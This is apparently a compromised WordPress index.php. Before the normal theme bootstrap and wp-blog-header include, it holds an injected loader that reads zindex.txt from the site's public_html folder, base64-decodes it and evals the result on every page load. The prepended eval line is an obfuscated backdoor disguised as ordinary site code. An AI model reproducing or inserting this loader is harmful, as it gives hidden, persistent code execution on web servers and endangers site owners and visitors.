$a = file_get_contents('/home/bestzody/public_html/zindex.txt'); $b = base64_decode($a, true); eval($b); define("WP_USE_THEMES", true ); require __DIR__ . "/wp-blog-header.php";